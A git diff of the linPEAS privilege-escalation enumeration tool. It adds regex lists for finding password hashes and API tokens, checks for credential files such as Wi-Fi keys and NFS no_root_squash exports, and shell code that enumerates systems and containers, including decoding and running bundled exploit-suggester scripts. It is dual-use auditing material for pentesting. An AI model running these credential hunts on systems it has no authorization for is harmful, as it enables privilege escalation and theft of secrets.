diff --git a/.github/workflows/CI-master_tests.yml b/.github/workflows/CI-master_tests.yml index 4ec132e..70f01a3 100644 --- a/.github/workflows/CI-master_tests.yml +++ b/.github/workflows/CI-master_tests.yml @@ -172,4 +172,4 @@ jobs: run: linPEAS/linpeas.sh -h - name: Run macpeas - run: linPEAS/linpeas.sh -o SysI,Container,Devs,AvaSof,ProCronSrvcsTmrsSocks,Net,UsrI,SofI \ No newline at end of file + run: linPEAS/linpeas.sh -o system_information,container,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information \ No newline at end of file diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index ca9105a..b42abb6 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -13,7 +13,7 @@ If you want to **contribute adding the search of new files that can contain sens Also, in the comments of this PR, put links to pages where and example of the file containing sensitive information can be foud. ## Specific LinPEAS additions -From the PEASS-ng release **linpeas is auto-build from [linpeas_base.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/builder/linpeas_base.sh)**. Therefore, if you want to contribute adding any new check for linpeas/macpeas, please **add it in this file and create a PR to master**. +From the PEASS-ng release **linpeas is auto-build from [linpeas/builder](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/builder/)**. Therefore, if you want to contribute adding any new check for linpeas/macpeas, please **add it in this directory and create a PR to master**. *Note that some code is auto-generated in the python but most of it it's just written in different files that willbe merged into linpeas.sh*. The new linpeas.sh script will be auto-generated in the PR. ## Specific WinPEAS additions diff --git a/build_lists/regexes.yaml b/build_lists/regexes.yaml new file mode 100644 index 0000000..814bee9 --- /dev/null +++ b/build_lists/regexes.yaml @@ -0,0 +1,204 @@ +paths: + - $HOMESEARCH + - /etc + - /opt + - /tmp + - /private + - /Applications + - /var/www + - /var/log + - /private/var/log + - /usr/local/www/ + - $backup_folders_row + + +regular_expresions: + # Hashes passwords + - name: Hashed Passwords + regexes: + - name: Apr1 MD5 + regex: '\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' + + - name: Apache SHA + regex: '\{SHA\}[0-9a-zA-Z/_=]{10,}' + + - name: Blowfish + regex: '\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*' + + - name: Drupal + regex: '\$S\$[a-zA-Z0-9_/\.]{52}' + + - name: Joomlavbulletin + regex: '[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}' + + - name: Linux MD5 + regex: '\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' + + - name: phpbb3 + regex: '\$H\$[a-zA-Z0-9_/\.]{31}' + + - name: sha512crypt + regex: '\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}' + + - name: Wordpress + regex: '\$P\$[a-zA-Z0-9_/\.]{31}' + + + # Raw Hashes + - name: Raw Hashes + regexes: + #- name: md5 #Too many false positives + # regex: '(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)' + + #- name: sha1 #Too many false positives + # regex: '(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)' + + #- name: sha256 #Too many false positives + # regex: '(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)' + + - name: sha512 + regex: '(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)' + + # APIs + # https://github.com/l4yton/RegHex/blob/master/README.md + - name: APIs + regexes: + #- name: Artifactory API Token # False + + # regex: 'AKC[a-zA-Z0-9]{10,}' # False + + + #- name: Artifactory Password + # regex: 'AP[\dABCDEF][a-zA-Z0-9]{8,}' + + #- name: Authorization Basic # Too many false positives + # regex: 'basic [a-zA-Z0-9_:\.=\-]+' + + #- name: Authorization Bearer # Too many false positives + # regex: 'bearer [a-zA-Z0-9_\.=\-]+' + + - name: AWS Client ID + regex: '(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}' + extra_grep: '-Ev ":#|:<\!\-\-"' + + - name: AWS MWS Key + regex: 'amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}' + + - name: AWS Secret Key + regex: aws(.{0,20})?['"][0-9a-zA-Z\/+]{40}['"] + + #- name: Base32 #Too many false positives + # regex: '(?:[A-Z2-7]{8})*(?:[A-Z2-7]{2}={6}|[A-Z2-7]{4}={4}|[A-Z2-7]{5}={3}|[A-Z2-7]{7}=)?' + + #- name: Base64 #Too many false positives + # regex: '(eyJ|YTo|Tzo|PD[89]|aHR0cHM6L|aHR0cDo|rO0)[a-zA-Z0-9+/]+={0,2}' + + - name: Basic Auth Credentials + regex: '://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+' + + - name: Cloudinary Basic Auth + regex: 'cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+' + + - name: Facebook Access Token + regex: 'EAACEdEose0cBA[0-9A-Za-z]+' + + - name: Facebook Client ID + regex: ([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['"][0-9]{13,17} + + - name: Facebook Oauth + regex: > + [fF][aA][cC][eE][bB][oO][oO][kK].*['|"][0-9a-f]{32}['|"] + + - name: Facebook Secret Key + regex: > + ([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['"][0-9a-f]{32} + + - name: Github + regex: > + github(.{0,20})?['"][0-9a-zA-Z]{35,40} + + - name: Google API Key + regex: 'AIza[0-9A-Za-z_\-]{35}' + + - name: Google Cloud Platform API Key + regex: > + (google|gcp|youtube|drive|yt)(.{0,20})?['"][AIza[0-9a-z_\-]{35}]['"] + + - name: Google Drive Oauth + regex: '[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com' + + - name: Google Oauth Access Token + regex: 'ya29\.[0-9A-Za-z_\-]+' + + - name: Heroku API Key + regex: '[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}' + + - name: LinkedIn Client ID + regex: > + linkedin(.{0,20})?['"][0-9a-z]{12}['"] + + - name: LinkedIn Secret Key + regex: > + linkedin(.{0,20})?['"][0-9a-z]{16}['"] + + - name: Mailchamp API Key + regex: '[0-9a-f]{32}-us[0-9]{1,2}' + + - name: Mailgun API Key + regex: 'key-[0-9a-zA-Z]{32}' + + - name: Picatic API Key + regex: 'sk_live_[0-9a-z]{32}' + + - name: Slack Token + regex: 'xox[baprs]-([0-9a-zA-Z]{10,48})?' + + #- name: Slack Webhook #Not interesting + # regex: 'https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}' + + - name: Stripe API Key + regex: 'k_live_[0-9a-zA-Z]{24}' + + - name: Square Access Token + regex: 'sqOatp-[0-9A-Za-z_\-]{22}' + + - name: Square Oauth Secret + regex: 'sq0csp-[ 0-9A-Za-z_\-]{43}' + + - name: Twilio API Key + regex: 'SK[0-9a-fA-F]{32}' + + - name: Twitter Client ID + regex: > + [tT][wW][iI][tT][tT][eE][rR](.{0,20})?['"][0-9a-z]{18,25} + + - name: Twitter Oauth + regex: > + [tT][wW][iI][tT][tT][eE][rR].{0,30}['"\\s][0-9a-zA-Z]{35,44}['"\\s] + + - name: Twitter Secret Key + regex: > + [tT][wW][iI][tT][tT][eE][rR](.{0,20})?['"][0-9a-z]{35,44} + + #- name: Vault Token #False + + # regex: '[sb]\.[a-zA-Z0-9]{24}' + + + # Misc + - name: Misc + regexes: + - name: Basic Auth + regex: '//(.+):(.+)@' + + - name: Passwords1 + regex: (pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab) + + #- name: Passwords2 + # regex: 'passwd|creden|pwd' + + - name: Usernames + regex: 'username.*[=:].+' + + #- name: IPs + # regex: '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' + + #- name: Emails # Too many false positives + # regex: '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}' diff --git a/build_lists/sensitive_files.yaml b/build_lists/sensitive_files.yaml index 7fd0282..f3d234e 100644 --- a/build_lists/sensitive_files.yaml +++ b/build_lists/sensitive_files.yaml @@ -65,6 +65,9 @@ common_directory_folders: - /usr - /var +peas_checks: "peass{CHECKS}" +peas_regexes_markup: "peass{REGEXES}" + peas_extrasections_markup: "peass{EXTRA_SECTIONS}" peas_finds_markup: "peass{FINDS_HERE}" @@ -111,6 +114,7 @@ variables: defaults: auto_check: False #The builder will generate a check for the file (only linpeas) bad_regex: "" #The regex used to color red. If only_bad_lines and no line_grep, then only lines containing this regex will be printed + very_bad_regex: "" #The regex used to color yellow/red check_extra_path: "" #Check if the found files are in a specific path (only linpeas) good_regex: "" #The regex to color green just_list_file: False #Just mention the path to the file, do not cat it @@ -541,11 +545,11 @@ search: files: - name: "mongod*.conf" value: - type: f - remove_empty_lines: True - remove_regex: '\W+\#|^#' - search_in: - - common + type: f + remove_empty_lines: True + remove_regex: '\W+\#|^#' + search_in: + - common - name: Supervisord @@ -556,11 +560,11 @@ search: files: - name: "supervisord.conf" value: - bad_regex: "port.*=|username.*=|password.*=" - only_bad_lines: True - type: f - search_in: - - common + bad_regex: "port.*=|username.*=|password.*=" + only_bad_lines: True + type: f + search_in: + - common - name: Cesi value: @@ -584,19 +588,19 @@ search: files: - name: "rsyncd.conf" value: - bad_regex: "secrets.*|auth.*users.*=" - type: f - remove_empty_lines: True - remove_regex: '\W+\#|^#' - search_in: - - common + bad_regex: "secrets.*|auth.*users.*=" + type: f + remove_empty_lines: True + remove_regex: '\W+\#|^#' + search_in: + - common - name: "rsyncd.secrets" value: - bad_regex: ".*" - type: f - search_in: - - common + bad_regex: ".*" + type: f + search_in: + - common - name: Hostapd value: @@ -606,12 +610,64 @@ search: files: - name: "hostapd.conf" value: - bad_regex: "passphrase.*" - remove_regex: '^#' - remove_empty_lines: True + bad_regex: "passphrase.*" + remove_regex: '^#' + remove_empty_lines: True + type: f + search_in: + - common + + - name: Wifi Connections + value: + config: + auto_check: True + + files: + - name: "system-connections" + value: + files: + - name: "*" + value: + bad_regex: "psk.*" + only_bad_lines: True + type: f + type: d + search_in: + - /etc + + - name: PAM Auth + value: + config: + auto_check: True + + files: + - name: "pam.d" + value: + files: + - name: "sshd" + value: + bad_regex: ".*" + line_grep: '-i "auth"' + remove_regex: "^#|^@" + type: f + type: d + search_in: + - /etc + + - name: NFS Exports + value: + config: + auto_check: True + + files: + - name: exports + value: + very_bad_regex: "no_root_squash|no_all_squash" + bad_regex: "insecure" + remove_regex: '\W+\#|^#' type: f search_in: - - common + - /etc - name: Anaconda ks value: @@ -627,7 +683,6 @@ search: search_in: - common - - name: Racoon value: config: @@ -1919,7 +1974,7 @@ search: auto_check: False files: - - name: ".*_history.*" + - name: '*_history*' value: bad_regex: "$pwd_inside_history" line_grep: '-a "$pwd_inside_history"' @@ -2134,6 +2189,32 @@ search: type: f search_in: - common + + - name: Pre-Shared Keys + value: + config: + auto_check: True + + files: + - name: "*.psk" + value: + just_list_file: True + type: f + search_in: + - common + + - name: Pass Store Directories + value: + config: + auto_check: True + + files: + - name: ".password-store" + value: + just_list_file: True + type: d + search_in: + - common - name: FTP value: @@ -2395,6 +2476,21 @@ search: search_in: - common + - name: Jetty + value: + config: + auto_check: True + + files: + - name: "jetty-realm.properties" + value: + bad_regex: ".*" + remove_empty_lines: True + remove_regex: '^#' + type: f + search_in: + - common + - name: Wget value: config: diff --git a/linPEAS/README.md b/linPEAS/README.md index 3ec7562..c9c7389 100755 --- a/linPEAS/README.md +++ b/linPEAS/README.md @@ -69,14 +69,13 @@ By default linpeas takes around **4 mins** to complete, but It could take from * **Other parameters:** - **-a** (all checks) - This will **execute also the check of processes during 1 min, will search more possible hashes inside files, and brute-force each user using `su` with the top2000 passwords.** +- **-e** (extra enumeration) - This will execute **enumeration checkes that are avoided by default** - **-s** (superfast & stealth) - This will bypass some time consuming checks - **Stealth mode** (Nothing will be written to disk) - **-P** (Password) - Pass a password that will be used with `sudo -l` and bruteforcing other users -- **-v** (verbose) - Print information about the checks that haven't discovered anything and about the time each check took +- **-d** (Debug) - Print information about the checks that haven't discovered anything and about the time each check took This script has **several lists** included inside of it to be able to **color the results** in order to highlight PE vector. -LinPEAS also **exports a new PATH** variable during the execution if common folders aren't present in the original PATH variable. - ![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/help.png) ## Hosts Discovery and Port Scanning diff --git a/linPEAS/builder/linpeas_builder.py b/linPEAS/builder/linpeas_builder.py index 181d76b..be16c29 100644 --- a/linPEAS/builder/linpeas_builder.py +++ b/linPEAS/builder/linpeas_builder.py @@ -1,5 +1,6 @@ from .src.peasLoaded import PEASLoaded from .src.linpeasBuilder import LinpeasBuilder +from .src.linpeasBaseBuilder import LinpeasBaseBuilder from .src.yamlGlobals import FINAL_LINPEAS_PATH import os @@ -7,7 +8,14 @@ import stat #python3 -m builder.linpeas_builder def main(): + # Load configuration ploaded = PEASLoaded() + + # Build temporary linpeas_base.sh file + lbasebuilder = LinpeasBaseBuilder() + lbasebuilder.build() + + # Build final linpeas.sh lbuilder = LinpeasBuilder(ploaded) lbuilder.build() lbuilder.write_linpeas(FINAL_LINPEAS_PATH) diff --git a/linPEAS/builder/linpeas_parts/1_system_information.sh b/linPEAS/builder/linpeas_parts/1_system_information.sh new file mode 100644 index 0000000..40660da --- /dev/null +++ b/linPEAS/builder/linpeas_parts/1_system_information.sh @@ -0,0 +1,195 @@ +########################################### +#-------------) System Info (-------------# +########################################### + +#-- SY) OS +print_2title "Operative system" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" +(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," +warn_exec lsb_release -a 2>/dev/null +if [ "$MACPEAS" ]; then + warn_exec system_profiler SPSoftwareDataType +fi +echo "" + +#-- SY) Sudo +print_2title "Sudo version" +if [ "$(command -v sudo 2>/dev/null)" ]; then +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" +sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," +else echo_not_found "sudo" +fi +echo "" + +#--SY) USBCreator +if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then + print_2title "USBCreator" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" + + pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") + if [ -z "$pc_version" ]; then + pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2) + fi + if [ -n "$pc_version" ]; then + pc_length=${#pc_version} + pc_major=$(echo "$pc_version" | cut -d. -f1) + pc_minor=$(echo "$pc_version" | cut -d. -f2) + if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then + echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," + fi + fi +fi +echo "" + +#-- SY) PATH +print_2title "PATH" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" +echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" +echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" +echo "" + +#-- SY) Date +print_2title "Date & uptime" +warn_exec date 2>/dev/null +warn_exec uptime 2>/dev/null +echo "" + +#-- SY) System stats +if [ "$EXTRA_CHECKS" ]; then + print_2title "System stats" + (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" + warn_exec free 2>/dev/null + echo "" +fi + +#-- SY) CPU info +if [ "$EXTRA_CHECKS" ]; then + print_2title "CPU info" + warn_exec lscpu 2>/dev/null + echo "" +fi + +#-- SY) Environment vars +print_2title "Environment" +print_info "Any private information inside environment variables?" +(env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set" +echo "" + +#-- SY) Dmesg +if [ "$(command -v dmesg 2>/dev/null)" ] || [ "$DEBUG" ]; then + print_2title "Searching Signature verification failed in dmesg" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" + (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" + echo "" +fi + +#-- SY) Kernel extensions +if [ "$MACPEAS" ]; then + print_2title "Kernel Extensions not belonging to apple" + kextstat 2>/dev/null | grep -Ev " com.apple." + + print_2title "Unsigned Kernel Extensions" + macosNotSigned /Library/Extensions + macosNotSigned /System/Library/Extensions +fi + +if [ "$(command -v bash 2>/dev/null)" ]; then + print_2title "Executing Linux Exploit Suggester" + print_info "https://github.com/mzet-/linux-exploit-suggester" + les_b64="peass{LES}" + echo $les_b64 | base64 -d | bash + if [ "$EXTRA_CHECKS" ]; then + echo $les_b64 | base64 -d | bash -s -- --checksec + fi + echo "" +fi + +if [ "$(command -v perl 2>/dev/null)" ]; then + print_2title "Executing Linux Exploit Suggester 2" + print_info "https://github.com/jondonas/linux-exploit-suggester-2" + les2_b64="peass{LES2}" + echo $les2_b64 | base64 -d | perl + echo "" +fi + +if [ "$(command -v brew 2>/dev/null)" ]; then + print_2title "Brew Doctor Suggestions" + brew doctor + echo "" +fi + + + +#-- SY) AppArmor +print_2title "Protections" +print_list "AppArmor enabled? .............. "$NC +if [ "$(command -v aa-status 2>/dev/null)" ]; then + aa-status 2>&1 | sed "s,disabled,${SED_RED}," +elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then + apparmor_status 2>&1 | sed "s,disabled,${SED_RED}," +elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then + ls -d /etc/apparmor* +else + echo_not_found "AppArmor" +fi + +#-- SY) grsecurity +print_list "grsecurity present? ............ "$NC +( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") + +#-- SY) PaX +print_list "PaX bins present? .............. "$NC +(command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") + +#-- SY) Execshield +print_list "Execshield enabled? ............ "$NC +(grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," + +#-- SY) SElinux +print_list "SELinux enabled? ............... "$NC +(sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," + +#-- SY) Gatekeeper +if [ "$MACPEAS" ]; then + print_list "Gatekeeper enabled? .......... "$NC + (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," + + print_list "sleepimage encrypted? ........ "$NC + (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no + + print_list "XProtect? .................... "$NC + (system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no + + print_list "SIP enabled? ................. "$NC + csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no + + print_list "Connected to JAMF? ........... "$NC + warn_exec jamf checkJSSConnection + + print_list "Connected to AD? ............. "$NC + dsconfigad -show && echo "" || echo_no +fi + +#-- SY) ASLR +print_list "Is ASLR enabled? ............... "$NC +ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null) +if [ -z "$ASLR" ]; then + echo_not_found "/proc/sys/kernel/randomize_va_space"; +else + if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi + echo "" +fi + +#-- SY) Printer +print_list "Printer? ....................... "$NC +(lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null + +#-- SY) Running in a virtual environment +print_list "Is this a virtual machine? ..... "$NC +hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor) +if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then + detectedvirt=$(systemd-detect-virt) + if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi +else + if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi +fi diff --git a/linPEAS/builder/linpeas_parts/2_container.sh b/linPEAS/builder/linpeas_parts/2_container.sh new file mode 100644 index 0000000..7bba33b --- /dev/null +++ b/linPEAS/builder/linpeas_parts/2_container.sh @@ -0,0 +1,227 @@ +########################################### +#---------) Container functions (---------# +########################################### + +containerCheck() { + inContainer="" + containerType="$(echo_no)" + + # Are we inside docker? + if [ -f "/.dockerenv" ] || + grep "/docker/" /proc/1/cgroup -qa 2>/dev/null || + grep -qai docker /proc/self/cgroup 2>/dev/null || + [ "$(find / -maxdepth 3 -name '*dockerenv*' -exec ls -la {} \; 2>/dev/null)" ] ; then + + inContainer="1" + containerType="docker\n" + fi + + # Are we inside kubenetes? + if grep "/kubepod" /proc/1/cgroup -qa 2>/dev/null || + grep -qai kubepods /proc/self/cgroup 2>/dev/null; then + + inContainer="1" + if [ "$containerType" ]; then containerType="$containerType (kubernetes)\n" + else containerType="kubernetes\n" + fi + fi + + # Are we inside LXC? + if env | grep "container=lxc" -qa 2>/dev/null || + grep "/lxc/" /proc/1/cgroup -qa 2>/dev/null; then + + inContainer="1" + containerType="lxc\n" + fi + + # Are we inside podman? + if env | grep -qa "container=podman" 2>/dev/null || + grep -qa "container=podman" /proc/1/environ 2>/dev/null; then + + inContainer="1" + containerType="podman\n" + fi + + # Check for other container platforms that report themselves in PID 1 env + if [ -z "$inContainer" ]; then + if grep -a 'container=' /proc/1/environ 2>/dev/null; then + inContainer="1" + containerType="$(grep -a 'container=' /proc/1/environ | cut -d= -f2)\n" + fi + fi +} + +inDockerGroup() { + DOCKER_GROUP="No" + if groups 2>/dev/null | grep -q '\bdocker\b'; then + DOCKER_GROUP="Yes" + fi +} + +checkDockerRootless() { + DOCKER_ROOTLESS="No" + if docker info 2>/dev/null|grep -q rootless; then + DOCKER_ROOTLESS="Yes ($TIP_DOCKER_ROOTLESS)" + fi +} + +enumerateDockerSockets() { + dockerVersion="$(echo_not_found)" + if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then + SEARCHED_DOCKER_SOCKETS="1" + for dock_sock in $(find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" 2>/dev/null); do + if ! [ "$IAMROOT" ] && [ -w "$dock_sock" ]; then + echo "You have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_RED_YELLOW},g" + echo "Docker enummeration:" + docker_enumerated="" + + if [ "$(command -v curl)" ]; then + sockInfoResponse="$(curl -s --unix-socket $dock_sock http://localhost/info)" + dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4) + echo $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' + if [ "$sockInfoResponse" ]; then docker_enumerated="1"; fi + fi + + if [ "$(command -v docker)" ] && ! [ "$docker_enumerated" ]; then + sockInfoResponse="$(docker info)" + dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'Server Version' | cut -d' ' -f 4) + printf "$sockInfoResponse" | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' + fi + + else + echo "You don't have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_GREEN},g" + fi + done + fi +} + +checkDockerVersionExploits() { + if echo "$dockerVersion" | grep -iq "not found"; then + VULN_CVE_2019_13139="$(echo_not_found)" + VULN_CVE_2019_5736="$(echo_not_found)" + return + fi + + VULN_CVE_2019_13139="$(echo_no)" + if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1895" ]; then + VULN_CVE_2019_13139="Yes" + fi + + VULN_CVE_2019_5736="$(echo_no)" + if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1893" ]; then + VULN_CVE_2019_5736="Yes" + fi +} + +checkContainerExploits() { + VULN_CVE_2019_5021="$(echo_no)" + if [ -f "/etc/alpine-release" ]; then + alpineVersion=$(cat /etc/alpine-release) + if [ "$(echo $alpineVersion | sed 's,\.,,g')" -ge "330" ] && [ "$(echo $alpineVersion | sed 's,\.,,g')" -le "360" ]; then + VULN_CVE_2019_5021="Yes" + fi + fi +} + + +############################################## +#---------------) Containers (---------------# +############################################## +containerCheck + +print_2title "Container related tools present" +command -v docker +command -v lxc +command -v rkt +command -v kubectl +command -v podman +command -v runc + +print_2title "Container details" +print_list "Is this a container? ...........$NC $containerType" + +print_list "Any running containers? ........ "$NC +# Get counts of running containers for each platform +dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l) +podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) +lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) +rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) +if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then + echo_no +else + containerCounts="" + if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi + if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi + if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi + if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi + echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," + + # List any running containers + if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi + if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi + if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi + if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi +fi 